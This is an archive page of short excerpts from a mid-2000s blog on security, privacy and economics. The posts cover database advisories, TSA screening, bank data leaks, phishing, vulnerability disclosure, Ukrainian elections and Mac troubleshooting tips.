“We used to talk about the intent of a tank,” Colonel Thomas explained in an interview. “If you saw one, you knew what it was for. But the intent of electrons – to deliver a message, deliver a virus, or pass covert information – is much harder to figure.” Ian Grigg points out an interesting […]

 

Database Flaws More Risky Than Discussed

Rob Lemos has an article in CNET about NGSSoftware. On Thursday, they released a slew of advisories about Oracle products with flaws NGS had discovered 3 months ago. Now, it turns out that the problems may be more risky than thought. Alternately, the release of the exploit code may have cause SecurityFocus to raise its […]

 

Keynote can't Export to Web?!?

I was just playing with Keynote, working on some slides for Shmoocon, when I realized that I couldn’t get my slides onto the web! Now, I’ve griped about how Powerpoint makes its slides for the web, but at least it makes them. It seem that Tim Bray figured this out a while ago, but I […]

 

Good Luck To Ukraine!

I hope that your elections go smoothly, fairly, and peacefully, and that when they’re done, the people’s will is respected.

 

Winning the Battles, Losing the War

A historian, Isaiah (Ike) Wilson III, Ph.D, gave a talk a few months ago at Cornell, entitled “Thinking Beyond War: Civil-Military Operational Planning in Northern Iraq.” His basic thesis seems to be that, in contrast to a carefully planned and executed war campaign, there were no definitive plans for what to do after the Iraqi […]

 

Banks issue 2 factor auth

There’s a story in today’s CNET about banks issuing authentication tokens (like SecurID cards) to customers to address customer authentication issues. While these are useful, insofar as they will make phishing harder, they won’t stop it. Phishing will transform into an online, at the moment crime, which will be easier to catch, but work by […]

 

More on SSNs and Risk

In writing about Delta Blood Bank earlier today, one of the issues I was thinking about was the unnecessary use of social security numbers, and how it’s an industry standard. One area where this is particularly evident is in the bifurcated market for cell phones. At one end are providers like Virgin and MetroPCS, who […]

 

Delta Blood bank

Delta Blood Bank sent a letter Friday to donors, warning them a computer that held their personal information had been stolen and advising them to take steps against identity theft and credit card fraud. … In addition to the letter…The blood bank will no longer require Social Security numbers from its donors… No longer require […]

 

TSA Backs Down

Starting today, the federal Transportation Security Administration is telling its screeners to keep their hands to the “chest perimeters” of women unless handheld metal detectors beep when waved over their breasts. I’ve mentioned outrage at TSA intrusiveness in the past. (From Boston.com, via CSOOline.)

 

Ripping into ROI

Over at TaoSecurity, Richard Bejtlich writes: ‘ROI is no longer effective terminology to use in most security justifications,’ says Paul Proctor, Vp of security and risk strategies for META Group… Executives, he says, interpret ROI as ‘quantifiable financial return following investment.’ Security professionals view it more like an insurance premium. The C-suite is also wary […]

 

Anti-American Nuts Unfairly Accuse Military of Torture

[DOD interrogators presented themselves as FBI agents and…] These tactics have produced no intelligence of a threat neutralization nature to date and CITF believes that techniques have destroyed any chance of prosecuting this detainee. If this detainee is ever released or his story made public in any way, DOD interrogators will not be held accountable […]

 

The problem(s) with ID cards

Europhobia nails the link between privacy and economics in the UK imposes national ID cards stupidity: But usually what gets them is “what? I’ll have to pay eighty-five quid for this thing?” No, Europhobia, they’ll have to pay 85 quid for the card, and another 10 quid in taxes for the backend database. (Figuring 60% […]

 

Mac Sysadmining: Find missing man pages

After upgrading to Panther and installing X-Tools, several people complained that some unix man pages, specifically section 3 (standard library), are missing. For example, if you try: % man 3 strcmp and get no man page, you need to follow procedure below: Remove /Library/Receipts/BSD.pkg/ (rename or delete) Insert Panther CD 1 Install BSD package from […]

 

Effects of democracy on health

The British Medical Journal has just published a study showing either that democracy makes you live longer, or living in a dictatorship kills you, by three Spanish professors.

 

Not Just A Good Defense

Michael Froomkin comments: We vastly overestimated the speed with which non-techies would take up the toys; the growing and enduring dominance of one software platform that didn’t take up the toys; and especially the ability of the empire to strike back via both tech (trusted user) and law (DMCA and worse). Some time about four […]

 

What Did Fox TV Know and When Did They Know It?

Scrivener has an interesting post about an episode of ‘Family Guy’ that shows Osama bin Laden bypassing airport security with a song and dance routine. “This was all quite amusing in 2000. Does it mean anything in retrospect? You decide.”

 

Econ and Security papers

Ross Anderson has added three papers to his Economics and Security Resource page: Fetscherin and Vlietstra’s DRM and music: How do rights affect the download price? shows that the prices of music tracks sold online are mostly determined by the rights granted to the purchaser – including the right to burn, copy or export the […]

 

Three By Froomkin

Michael Froomkin has three nice posts today. First, Inside The TSA, we learn that power tends to corrupt: This account of the goings-on at the MIA TSA branch, brought to you by the feisty local Miami New Times, is worse than not pretty. It’s pretty ugly: allegations of theft from passengers’ bags, sexual harassment (of […]

 

Good Old Fashioned Cooking

Julie, formerly of the Julie/Julia project, has an article in Archaeology on how to cook like the ancients. There are also recipies. Unfortunately, Mongolian Lamb Liqour is (as presented) less interesting than it sounds. (Via Samablog.)

 

First They Came For The Jews

The normally insightful JihadWatch writes: It sounds terrible: restricting their civil liberties. Until you read into the story and find that they’re talking about registration, profiling, and monitoring of mosques and Islamic organizations. Horrors! Registration may inconvenience some people, but after all, a lot of people were inconvenienced on 9/11; as with all these measures, […]

 

People Will Sign Anything

Doug Barnes has a great reciept on You Must Be Present To Win. [Update: Gosh, I wish I’d said something insightful here. Stay a minute, read the rest of my ramblings!]

 

Releasing Criminals

My friend Sameer takes issue with my hoping for experimentation by criminals, on two grounds: First, he believes I’m encouraging violence. This wasn’t my intent. I assume that there are all sorts of ways to non-violently behave badly, from calling a guard snookums to having a tattoo needle in your cell. However, I don’t know. […]

 

How Much Is Risk Management Worth?

David Akin blogs that Fitch Ratings has purchased Toronto’s Algorithmics for $175M (the press release is datelined New York, so I’m guessing that’s a US dollar figure). Algorithmics makes risk management software, focusing on market risks for banks, things like hedging strategies and BASEL II compliance (based on a quick read of their site.) So […]

 

A good day for liberty

In its powerfully worded decision, the [UK Law Lords] said that the government’s “draconian” measures unjustly discriminate against foreigners since they do not apply to British citizens and constitute a lopsided response to the threat of a terrorist attack. (From The New York Times, see also the BBC or Volokh.) WASHINGTON (AP) — A [US] […]

 

Clever criminals

Over at Marginal Revolution, Alex Tabarrok quotes a letter from an inmate: [Inmate:] A privately owned and publicly traded company like CCA has no incentive to rehabilitate criminals.  It is in the best interests of the company for even more criminals to exist.  Unfortunately, the same is true of government run prisons.  And contrary to […]

 

Quickies

Scriviner.net has an interesting article about taxes and your phone company. Any article that starts with an error about how long ago the Spanish American war took place is a little worrisome, but I love watching badly written law becoming irrelevant. Stefan Geens has a great article taking a simple question and exploring the math […]

 

Browser privacy from the server?

A friend writes and asks: I’m working in NYC now, as the Web Admin for Safe Horizon. We’re the largest service agency in the US for victims of violence, crime or abuse. We’re interested in putting in some features into our site, but we have to protect our visitor’s privacy, since they might be visiting […]

 

Signalling by Counting Low Hanging Fruit?

I’ve been thinking a lot about signaling software security quality. Recall that a good signal should be easy to send, and should be easier for a higher quality product. I’d like to consider how running a tool like RATS (link) might work as a signal. RATS, the Rough Auditing Tool for Security, is a static […]

 

Referrer spam: The end is ROI

The first two claim to be UNDER CONSTRUCTION, and this makes my hypothesise that they are honeypots of a sort, respectively researching whether Deep-URLs (“/friendslinks.php”) or merely Root-URLs (“/”) are most effective methods of Referrer-Spamming, plus also providing a check to see which blogs are the most valuable ones to be worth spamming. In short: […]

 

Welcome, Carnival readers!

My friend Rob Sama is hosting this week’s Carnival of the Capitalists, and was kind enough to give me a shout out. So, welcome if you’re coming in from there. I’m traveling on business, so blogging will be a little slow, but please, have a look around! I try to apply economics to security problems […]

 

State Failure 101

Global Guerrillas has a great post on how US efforts in Iraq are broken: Unfortunately, the US effort to rebuild Iraq is out of synch (a full 180 degrees) with what is really needed.  If we map US efforts to Maslow’s hierarchy we see something quite unsettling. 

 

Two on Liberty

Ed Hasbrouck has a long post on the impact of the new “intelligence reform” bill on privacy and liberty. The CBC has an article on Australia imposing random drug tests on its consumer-units, or citizens, or something.

 

Strictly Off The Record…

Nikita Borisov and Ian Goldberg have released Off-the-Record Messaging, an IM plugin for private communication providing not only the usual encryption and authentication, but also deniability and perfect forward secrecy. Deniability avoids digital signatures on messages (while preserving authenticity and integrity), so there is no hard-to-deny proof you wrote anything in particular; in fact, there […]

 

Be Careful What You Wish For, Air Force

Federal Computer Week has a story about the Air Force’s efforts to patch faster: Officials’ ultimate goal is to have software patches implemented across the Air Force in minutes. During the next few months, they hope to cut the time from tens of days to just days, said Col. Ronnie Hawkins, director of communications operations […]

 

Mac toys

Chibineko.org has a nice page of software for techies switching to a Mac. Speaking of techie Mac use, I’m playing with subversion and the sweet looking SCPlugin. To make it see my ssh keys, I’ve added SSHkeychain. That required logging out and back in. After I did, I was getting lots of Keychain errors. It […]

 

CIBC & SB136

CIBC is a Canadian bank, who has recently been sued by a West Virginia scrapyard operator for faxing their customer’s private data to him. I’ve blogged about them here and here. (It turns out that other banks are doing the same thing, as David Akin blogs.) SB 1386 is a California law that requires companies […]

 

BarlowFriendz: A Taste of the System

John Perry Barlow writes about the apparently limitless suspension of the Constitution that’s already happened in airports. But randomly searching people’s homes against the possibility that someone might have a bio-warfare lab in his basement would reveal a lot of criminal activity. And it is certainly true that such searches would reduce the possibility of […]

 

Thoughts on Kerik's withdrawl

Kerik issued a statement saying: “In the course of completing documents required for Senate confirmation, I uncovered information that now leads me to question the immigration status of a person who had been in my employ as a housekeeper and nanny,” he said. “It has also been brought to my attention that for a period […]

 

Kerik Withdraws

The BBC is reporting that Kerik has withdrawn, citing personal reasons. The BBC also mentions controversy over his link to Taser, Inc, and a possible nannygate issue.

 

Google Groups, Privacy and Spam

Writing to Farber’s Interesting People list, Lauren Weinstein writes: Their new system is obscuring *all* e-mail addresses in *all* netnews messages in the archive (including the vast numbers of messages that do not originate within the Google environment and/or that predate the existence of Google Groups). This includes not only the addresses of individual netnews […]

 

Optimizing acceptable bugs?

In a recent comment, Pete Lindstrom asks: So do you think this can be modeled using a version of the El Farol’s Bar you post about in the future? Maybe we can optimize the number of acceptable bugs… How does/should the policies of Microsoft and Oracle affect this model? I’ve been thinking about this, and […]

 

To sleep, perchance to sleep?

After installing Apple’s latest security update, my laptop no longer goes to sleep when I close it. Is anyone else with more time experiencing this? I am using Bernhard Baehr’s excellent Sleepwatcher, a daemon that allows you to add sleep and wakeup actions, but that hasn’t changed in a while. (If I had more time, […]

 

What Sci/Tech books are worthwhile?

Ed Felten writes about a library survey in which few tech books, and none worthwhile, made the top-1000 list. He concludes: It’s the technology books that really disappoint. These books are useful, to be sure, and it’s not surprising that libraries have them. What’s really sad is that no book about the intellectual content or […]

 

What cost security?

For traditional financial services alone, compliance with the PATRIOT anti-money laundering provisions is projected to cost $10.9 billion by the end of 2005, according to the research firm Celent Communications. No wonder that the champions of forced business spying didn’t want to present even this watered down procedure for congressional review, says banking industry consultant […]

 

Mac debugging

Daring Fireball points to a new Apple technote full of ways to debug programs under MacOS X.

 

Nobody goes there anymore, it's too crowded

In 1994, Brian Arthur introduced the `El Farol Bar’ problem as a paradigm of complex economic systems. In this model a population of agents have to decide whether to go to the bar each thursday night. All agents like to go to the bar unless it is too crowded (i.e. when more that 60% of […]

 

Destroying the airlines in order to save them

My friend Dave writes about trains vs. planes: On that topic, it’s not hard to make a point that train travel is really not far behind airline travel. For me, it was 45 minutes to the station, only 10 minutes to checkin and board, 7.5 hours to DC in a comfy seat (with 120v power […]

 

Code analysis and safe languages

Ekr writes: These tools aren’t perfect and it certainly would be nice to have better tooling, but it’s worth noting that a lot of the bugs they find are the kind of thing that could be entirely eliminated if people would just program in safer languages. For instance, the buffer overflow vulnerabilities which have been […]

 

Privacy lessons from CIBC

The disaster over at CIBC is telling, and bears a little exploration. The real victims, whose details were faxed to never saw the violation of their privacy. It was CIBC tossing data around incompetently, all the while publicly proclaiming their commitment to privacy. Wade Peer, a scrapyard operator in West Virginia brought the three years […]

 

Eating their own dogfood

In a move that surprises no one, the screensaver that Lycos created to target spammers has been used to target Lycos. The screensaver was designed to launch a DOS attack against sites that are known for their spamming techniques. (From Chris Richardson at SecurityProNews via Mort. See the ZDNet UK article for more details.)

 

Cool bug!

I believe this is a bug in Netnewswire, and will be reporting in there in just a second, but it’s so pretty I wanted to share it. Note the menubar has gone transparent, but is still readable. It looks way cool this way. Maybe someone will find a hook in the OS to allow us […]

 

Canadian privacy law & CIBC

Businesses can avoid potential public relations and legal nightmares by developing privacy policies, authentication processes and using cutting-edge technology. The Canadian Imperial Bank of Commerce learned this the hard way last week when U.S. scrapyard operator Wade Peer went public with his story about how one of Canada’s largest banks was flooding his fax machine […]

 

oooh, look an unscientific poll!

Go tell the pollsters that we’ve had enough government sponsored groping. [Update: You may use BugMeNot for a login, or you might want to create a new one for the poll, and feed the bugmenot database.]

 

Kerik for DHS?

The New York Times is reporting that Bernard Kerik, formerly of the NYPD, has been tapped for homeland security secretary. [Update: VikingZen has an alternate suggestion that shouldn’t be missed!],br> [Update 2: Declan has found a more relevant set of links than I did. Thanks to Secondary Screening.]

 
 

The metrics quest

There’s an interesting article on metrics over at CSO Online. The comments are great, too. Now if you’ll excuse me, I need to go ring a gong.

 

Freedom to travel in Ukraine

This information has been confirmed by another listener. She said that in ticket sales offices on Hnatyuk street in Lviv the cashier was extremely friendly to those who were traveling to Kiev, but she did record the passport data into some sort of catalogue. Maidan-INFORM has been stressing, that such practice of registering movement of […]

 

Training is not the answer

Florence Olsen writes in Federal Computer Week about security training: Last year, for example, officials at a federal financial institution tested employees’ adherence to the agency’s computer security policy against opening e-mail attachments from unknown sources. About half of the employees failed the test, Coe said. [Kathy Coe, regional director of educational services at Symantec] […]

 

The death of marketing…

John Lebkowsky comments that he’s being paid to blog by “Marqui.” The first two headlines on their web site sums it all up: MARKETING IS IN A STATE OF CRISIS! Watch the demo (5 minutes) I have to spend 5 minutes figuring out how you distinguish yourselves as a marketing company? Sheesh.

 

Financial Cryptography: 2005 – The Year of the Snail

Ian Grigg is on a roll with good posts. See this 2005 – The Year of the Snail Since he’s doing the thinking, and I haven’t had my coffee yet, I’ll just ask, what happens when this gets 10x worse? Is there anything acting as a serious brake to that? Also, Ian says “serious money” […]

 

Amateurs study cryptography; professionals study economics.

Ian has a fine post over at financial cryptography: The only thing I’m unsure of is whether it should be economics or risk. But as I roll it around my mind, I keep coming back to the conclusion that in the public’s mind, the popular definition of economics is closer to the image that we […]

 

Worms swamp security

Security experts take it as a truism that you can’t defend everything. So you have to make choices about what attacks to worry about, and which ones to ignore. A study released today claims that unprotected hosts are attacked once per second. (USA Today reports on the study, and avantgarde.com is utterly swamped. So I […]

 

Lycos' attack spammers@home

I’d like to add one bit about Lycos’ new attack spammers screensaver. Ed Felten writes most of what needs to be said about it: This is a serious lapse of judgment by Lycos. For one thing, this kind of vigilante attack erodes the line between the good guys and the bad guys. Spammers are bad […]

 

Paralyzed woman walks again

A SOUTH Korean woman paralysed for 20 years is walking again after scientists say they repaired her damaged spine using stem cells derived from umbilical cord blood. Hwang Mi-Soon, 37, had been bedridden since damaging her back in an accident two decades ago. Last week her eyes glistened with tears as she walked again with […]

 

Wikinews

SteveC, whose comments are broken, says: “wikinews is demoing here. When you have a hammer, everything looks like a nail. I can’t wait for wiki… wiki… wikigovernment. Or something. We could all edit the laws. yay!” Me, I want WikiAirlineSchedules.

 

CIA funded overthrows?

Cryptome points to a fascinating article in The Guardian about how the US is training young activists to undermine corrupt regimes: Funded and organised by the US government, deploying US consultancies, pollsters, diplomats, the two big American parties and US non-government organisations, the campaign was first used in Europe in Belgrade in 2000 to beat […]

 

Bad Security = Bad UI?

Allan Schiffman has sorted through the papers from the DIMACS Workshop on Usable Privacy and Security Software, and has summaries and recommendations in “Bad Security = Bad UI?.” [Update: Oh, the irony of a conference on usability naming all their files things like “blaze.pdf” or “garfinkel.ppt”– how about “blaze-usable-privsec.pdf,” so I can easily archive the […]

 

Music economics

Naxos is a classical music company. They bill themselves as the world’s leading classical label. They have a fascinating business model, which is that they find great ensembles, often in eastern Europe, have them record interesting music, and then sell it cheaply. I’ll often buy 2 or 3 Naxos CDs as experimentation. When they’re 7 […]

 

Containment?

America’s Secret War, by George Friedman, is reviewed in the Australian: The Americans had established and then strengthened a military presence in countries surrounding Saudi Arabia – Yemen, Oman, Qatar, Bahrain and Kuwait. Invasion of Iraq would complete the encirclement. “From a purely military view,” Friedman adds, “Iraq is the most strategic single country in […]

 

New look

For Yushchenko, and fair elections. It’s a small thing, but show your support. Turn your blog orange.

 

The revolutions are being blogged

From Iraq, the start of a new political party, and the jitters that come from living under totalitarianism. From Ukraine, people continue to rally and demonstrate against the hijacking of their democracy: The past four days have taught me something valuable: when I’m watching the situation unfold on television, I grow tense, fearful that it’s […]

 

Bush & Putin

Will President George W. Bush now stand up to Russia’s blatant imperial overreach in Ukraine? Will Mr. Bush protect America’s interest in the spread of democracy and free markets? While the President has touted good relations with his Russian counterpart, it is clear that Vladimir Putin financed and actively campaigned on behalf of an authoritarian […]

 

Evidence based…cooking

The curiosity that fueled the experiments in Mr. McGee’s first book is undiminished after 20 years, and his approach to cooking is still skeptical. He tries to take as little as possible for granted, asking at each step: Why am I doing this? Is there a better way? All this questioning has yielded conclusions, some […]

 

The democracy meme

“I will not accept the results of the presidential election until it is proved to me and the Ukrainian people that they are legitimate and credible in accordance with conditions set down by the constitution,” [Yanukovych] said in a statement. “I need no fictitious victory, a result which could lead to violence and victims. No […]

 

A market for journal articles, again

George Akerlof shared the 2001 Nobel prize in economics for his paper on “Lemon markets.” While reading Akerlof’s Nobel Prize essay, I was struck by the comment: I submitted “Lemons” there, which was again rejected on the grounds that the The Review did not publish papers on topics of such triviality. It seems to me […]

 

A lemons market for … anti-spyware

Anti-spyware software has many of the issues that other privacy software has had.* It’s hard to understand the technical means by which privacy is invaded. It’s hard to see that you have (some) spyware. And it’s hard to evaluate what anti-spyware software works, and what doesn’t. Well, it was. Eric Howes has started testing anti-spyware, […]

 
 

Travel Plans: Shmoocon

Crispin Cowan and I will be running a BOF at Shmoocon, on Evidence Based Security. Shmoocon is in DC, Feb 4-6 of next year.

 

NYT on TSA

These women and a good many others, both frequent and occasional travelers, say they are furious about recent changes in airport security that have increased both the number and the intensity of pat-downs at the nation’s 450 commercial airports. And they are not keeping quiet. … Most of the women interviewed said they did not […]

 

No fly list

A man with an expired passport got onto Air France flight 26 on Saturday, November 19th: Flight 026 from Paris to Washington Dulles International Airport was diverted to Bangor, Maine, after U.S. officials discovered that the man was listed on the government’s no-fly list. The man’s name also was on the State Department’s terrorist watch […]

 

Security and diplomacy

…Mr. Bush had to wade into a group of security agents to pull his lead Secret Service agent out of a shoving match with the Chilean police. The tape showing the president assuring the Chileans that his agent could come with him played over and over on television screens in the region this weekend. By […]

 

What I'd like from a social software web site

There are lots of so-called ‘social software’ web sites that help you umm stay in touch with friends, or make new ones or something (Friendster, Tribe, Orkut, etc). Some are more socially oriented, others are more about business. What I’d really like is one that supports my travel habits. I fly to lots of places. […]

 

Informed? comment

Experts tend to know that when journalists report on their subject, things get twisted up and wrong. You start to evaluate a publication by looking at how it does on subjects you know, and assume that its work is consistently at the same level. I’ve been (cautiously) reading Informed Comment, by Juan Cole. He tends […]

 

What's Google Worth?

I opened this blog, exactly three months and 250 posts ago, asking, “Why Did Google Pop?” (with a second post on the topic as well.) Nudecybot has two fascinating posts on Google today. The first is on Google bias, the second on gmail, and the fact that it now actually secures your email (way to […]

 

So who likes them?

Ryan Singel catches an AP article on RFID passports: On the latest passports, the agency has “taken a ‘keep it simple’ approach, which, unfortunately, really disregards a basic privacy approach and leaves out the basic security methods we would have expected to have been incorporated for the security of the documents,” said Neville Pattinson, an […]

 

Cost, Value of government

After the election, I asked What’s a Free Election worth?.” John Robb over at Global Guerrillas has a partial answer, which is what the 2nd intifada has cost both sides over 4 years: 10% of Israel’s GDP (roughly 2.5% of GDP per year), and a stunning 300% of GDP over 4 years for the Palestinians. […]

 

Phishing

There’s a 3 page article in the Washington Post on phishing, the use of fake email and web sites to capture usernames and passwords. The phishers often target financial institutions. Marcus Sachs, a former White House cyber-security adviser and current director of the SANS Internet Storm Center, said marketing departments at many banks do not […]

 

Deworming the Internet

The always engaging Doug Barnes has a new paper out, “Deworming the Internet“. The paper is more interesting because Doug is technically and legally savvy. (Always a dangerous combination.) The paper evaluates regulations, markets, government intervention, litigation, and finally, a set of suggestions for what is most likely to work. Its perhaps the most comprehensive […]

 

Secretly admired blogs

Discovered a bunch of friends’ blogs today: You Must Be Present to Win (Doug Barnes), Creative Destruction (Sameer), Evil Geniuses For A Better Tomorrow (Jim McCoy, from whom I stole the “Most Evil Genius” gag title I used while at Zero-Knowledge).

 

Stolen EFF docs at WIPO negotiations

The EFF is doing a great job trying to prevent bad law from being created at a global level. There’s a bizzare story of EFF docs being stolen and trashed to prevent their message getting out. Cory writes: We ended up posting a guard over the table — thanks to Rufus Pollock from the Campaign […]

 

Big mother is watching

Great cartoon at Ok/Cancel. [Update: The image doesn’t fit on a lot of browsers with my CSS so its now just a link.]

 

Security & Outsourcing

[Inland Revenue] learned a lesson after one incident, during the previous EDS contract, when its security department found out about cost-saving plans to shut a data centre and move sensitive information to a shared site only after an internal memo was circulated. Computing has a good basic article on security issues in outsourcing of IT […]

 

A Market for Journal Articles?

In A Market for Journal Articles, Alex Tabarrok refers to a paper by David Zetland on A Market for journal articles. Zetland suggests that journal publishers should buy manuscripts in an auction.  You probably already have some objections, Where would the money come from?  Why would journal editors buy what they can get for free? […]

 

The height of logic

“The question was, why do I support a strong dollar policy? The answer is because it is our policy,” [US Treasury secretary John] Snow said. “Our dollar policy remains unchanged because a strong dollar is in both the national and international interest.” He pledged to curb the US massive budget deficit – but said the […]

 

TSA's identity obsession

US Homeland Security undersecretary Asa Hutchinson said the current practice of airlines giving the names of passengers to US officials 15 minutes after take-off did not make sense. … “If we have to have information 60 or 45 minutes before, you’ve got to close off the passengers that come in at the last second,” he […]

 

Glad to be a perfect straight man

In his response to my comments on vulnerability hunting, Pete Lindstrom discusses four ways to make things better: Legislate/enforce the law Buy exploits now and then Create Software security data sheets More honeypots I don’t think that (1) actually helps. More laws against finding vulns makes life harder for the good guys, by moving information […]

 

TSA ignores the public

As I and others >predicted, the TSA has chosen to run roughshod over our concerns. Interestingly, they claim that we have implicitly consented to the data being used this way. That’s interesting, because in the comments which I sent to them, I explicitly stated that I don’t consent. (Search this document for the words “do […]

 

Blog changes

Thanks to Dave and Lisa, I’ve moved to a new host. Things may have unsettled during the move. We’ve also added a feature that closes comments after a bit, because old posts are getting nothing but blogspam.

 

A downside to data warehousing

A long story in the New York Times ends: Still, as Wal-Mart recently discovered, there can be such a thing as too much information. Six women brought a sex-discrimination lawsuit against the company in 2001 that was broadened this year to a class of about 1.6 million current and former female employees. Lawyers for the […]

 

How not to find vulnerabilities (2)

Pete Lindstrom has argued that we need to end the bug-hunt: Once evaluated, neither reason provides a good foundation for continuing the practice of vulnerability seeking, but it gets much worse when we consider the consequences. There is a rarely mentioned upside to all this bugfinding, which is that researchers use the exploit code to […]

 

How not to report vulnerabilities

This week Finjan announced that it has told Microsoft of 3, or 10, or maybe 19 issues with SP2. Robert Lemos at CNET writes: “We don’t want to argue with Microsoft about these things,” he said. “We found the 19 vulnerabilities, and we showed that you could take remote control of a computer.” However, Microsoft’s […]

 

Kaspersky Labs switches to a new naming scheme

Kapersky Labs makes some of the best anti-virus software out there, as analyzed by the Virus Test Center at the University of Hamburg. They recently announced a new naming scheme. I’ve been thinking a lot about naming schemes recently, and I think this one could be better. Let me take it apart, and explain why. […]

 

"An abundance of caution"

Hundreds of passengers were evacuated briefly Thursday from the main terminal at Dulles International Airport outside Washington after airport screeners thought a suspicious image on an X-ray monitor might be a gun. Screeners spotted the image about 4:40 p.m. EST Thursday and the terminal reopened about an hour later. Passengers went through security checkpoints again, […]

 

Mac 10.3.6

Macworld excerpts a very detailed analysis of the MacOS 10.3.6 update. Its too bad that Apple chooses to give us a 22 item change description when they’ve changed upwards of 1,000 files.

 

Two on Risk

There’s a nice interview with Kathleen Hagerty over at CSO. She’s a finance professor, talking about risk. (Speaking of business school professors, work by Martin Loeb and Lawrence Gordon on the Economics of Information security investment is outstanding, and unfortunately, not online as an html or pdf file.) Second, I just got around to reading […]

 

WTO, Bastion of liberty?

Antigua and Barbuda have won a case at the World Trade Organization, claiming that US laws against internet gambling are a violation of the WTO rules.

 

More on 700 Arrests

Yesterday, I mentioned the 700 arrests [in the United States] in an attempt to deter terrorist activity. Also yesterday, several residents of The Hauge violently objected when the police showed up to arrest them. This is a pattern in the arrest of Al Qaeda suspects: Some of them decide that shooting the police is the […]

 

DETER testbed

There’s a coalition of universities working on a security testbed, called DETER. It’s an excellent idea, and apparently, they’re up and running. I look forward to the output from the conference. I hope they’ll ensure that all papers are online and available to the public.

 

Rushed Security

Samablog, irked that Rush has stolen his joke, explains that you can get at all of Rush’s $7 a month content, just by turning off all the scripting stuff in your browser. He then goes on to say: “What it says that a celebrity of Limbaugh’s stature keeps his site so insecure, I don’t know.” […]

 

9th Circuit limits police privacy

The chief warned Anthony Johnson to point his video camera elsewhere, then wrestled the camera away and put Johnson in jail for recording communication without permission, court records say. … A 9th Circuit U.S. Court of Appeals panel last week reinstated Johnson’s suit, which had been thrown out by a federal magistrate in Tacoma, and […]

 

Easier to get forgiveness than permission

So when will the public be able to easily and cheaply adopt useful security technologies that cost next to nothing? Asks Nudecybot. And the answer is…NOW! Why wait? Generate some keys and use them!

 

"Better Than Nothing Security"

Eric Rescorla has a great post reporting from the IETF on the “Better Than Nothing Security BOF.” As I see it, this boils down to an understanding that paying for digital signatures is very expensive, while we’ve known for ten years that “keys are cheap.” (Thanks, Eric!) The SSH folks got this very right: You […]

 

Vonage, FCC

U.S. regulators ruled Tuesday that providers of Internet-based phone call services fall under the jurisdiction of the federal government and cannot be regulated by states. … Vonage has been battling public utilities officials in Minnesota who want the company to register in the state as a telecommunications service, subjecting it to rate regulation and other […]

 

Garbage In…

There’s a post over at BoingBoing, laughing at some poor software transcription of Jabberwocky. Hello? What do you expect? The poem is full of nonsense words. If my speech recognition program starting putting brilling and slithy toves in my text, I’d be pissed off. So of course it gets this wrong. C’mon, folks, you want […]

 

NC Voting Issues Could Lead To Special Election

“The bottom line that we have heard from the manufacturer is that these votes are not missing. They’re lost,” county commissioner-elect Tom Steepy said. “It’s very disheartening. It really is.” Damn right it is. Voting machines should produce paper ballots, or their CEOs should offer to commit sepuku over any failures. (From WRAL.com Carteret Voting […]

 

Chinese Flee Formal Banking

The friends often lend each other large amounts on the strength of a handshake and a handwritten i.o.u. Both sides then go to an automated teller machine or bank branch to transfer the money, which is then withdrawn from the bank. Or sometimes they do it the old-fashioned way: exchanging burlap sacks stuffed with cash. […]

 

700 arrests made to avert election terrorist attack

Jihad Watch points to an AP story: More than 700 people were arrested on immigration violations and thousands more subjected to FBI interviews in an intense government effort to avert a terrorist attack aimed at disrupting the election. As with past unrealized al Qaeda threats, law-enforcement officials said yesterday they don’t know for sure whether […]

 

Happy Berlin Wall Day!

We need more holidays that celebrate liberty. The fall of the Berlin Wall is a good a day as you can find. However, Wikipedia points out that: Some believe November 9 would have made a good German National Holiday, since November 9 is also the date of the declaration of the Weimar Republic in 1918. […]

 

Hamdan vs Rumsfeld

The only three facts that are necessary to my disposition of the petition for habeas corpus and of the cross-motion to dismiss are that Hamdan was captured in Afghanistan during hostilities after the 9/11 attacks, that he has asserted his entitlement to prisoner-of-war status under the Third Geneva Convention, and that the government has not […]

 

Richard Clarke says get over 'cyberterror'

Overuse of the term ‘cyber-terrorism’ is confusing board directors and preventing much needed investment in IT security, says former White House security advisor Richard Clarke. Now if we could just get rid of the term “cyber,” we’d be all set to have a mature discussion. (From VNUnet, via InfoSecNews.)

 

Computer Security and The Human Factor

Nudecybot has a thoughtful post on Computer security and the human factor. He takes a discussion we had, and organizes it well. He talks about airline safety vs computer safety, and how an anonymous reporting system has helped in the airline case. I think there’s two bits that he misses that make the airline safety […]

 
 

Mac Trivia: Zero Byte resource error

You can probably skip this post. I wanted to blog it to help people with this problem solve it faster. It involves the Mac System update tool throwing up a dialog that says: A networking error has occurred: zero byte resource (-1014). Make sure you can connect to the Internet, then try again. [Update, 20 […]

 

Mac Trivia: Zero Byte resource error

You can probably skip this post. I wanted to blog it to help people with this problem solve it faster. It involves the Mac System update tool throwing up a dialog that says: A networking error has occurred: zero byte resource (-1014). Make sure you can connect to the Internet, then try again. I was […]

 

Corporate governance goals impossible (II)

Further quoting from that same article in the Register about the impact of new rules: Business managers becoming fed up with FUD In a separate study, more than a third of the 30 delegates to the Axis Action Forum admitted that their Board had never asked for an update on security or implications of security […]

 

New Software

Thanks to our industrious sysadmin, we have a new rev of MT in place. It’s much more aggressive about weeding comments, so what you say won’t show up instantly. If your real comment doesn’t show up, please drop me a note. And please, do leave comments. Even if it’s against your better judgement. (Yes, I’m […]

 

Al Qaeda's use of cryptography – scant evidence

Not too long ago, I gave a talk on privacy technology to the Atlanta chapter of the High Tech Crime Investigators Association. It was a talk that several of us at Zero-Knowledge had learned to give. The basic method for talking to police about privacy is to start from the need to reduce and prevent […]

 

"Good thing there's a monopoly"

“Unionized employees at the SAQ are launching a four day strike that will shut down Quebec liquor board stores for the weekend.” Says the Montreal CBC site. The SAQ is Quebec’s government owned liquor monopoly. Non-SAQ stores can sell only bad wine and some beer. (No, really, there’s a list of approved wines that others […]

 

More maps

Bigpicture has put up 11 map links, some of which are very cool. I really like the parallel maps of 2000 vs 2004. (If you use Safari, with its transparent drag, you can produce your own overlay maps!) I also like the county-by-county maps, they’re elegant. Not so good is the chartjunk map from the […]

 

Return Addresses

Canada Post has apparently told the world that they’ll only deliver mail with a return address. This is clearly silly, phone books are full of valid return addresses for your city. Over at StupidSecurity, nrh asks: Part of the reason I delayed was that I was trying to find out if this was even legal. […]

 

Obfuscated Voting Redux

No, not the elections, silly, the contest! And now the results are up, and it seems that Michal Zalewski is in the lead.

 

British Petition

There’s a petition to stop ID cards in the U.K. Alas, there’s no where for residents of Clark county, Ohio, to express opinions. (Via Steve at Fractalus.)

 

Microsoft pre-warning of patches

